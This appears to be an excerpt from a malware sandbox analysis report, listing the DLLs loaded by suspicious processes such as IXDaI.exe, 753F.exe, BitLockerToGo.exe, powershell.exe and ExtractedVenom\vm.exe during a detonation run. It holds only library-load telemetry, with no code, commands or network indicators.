Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: cdprt.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wpnapps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: capabilityaccessmanagerclient.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.userer.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\ftejced	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: ntvdm64.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\IXDaI.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\F6D9.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\B552.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mshtml.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: srpapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: msiso.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\753F.exe	Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptnet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rasadhlp.dll
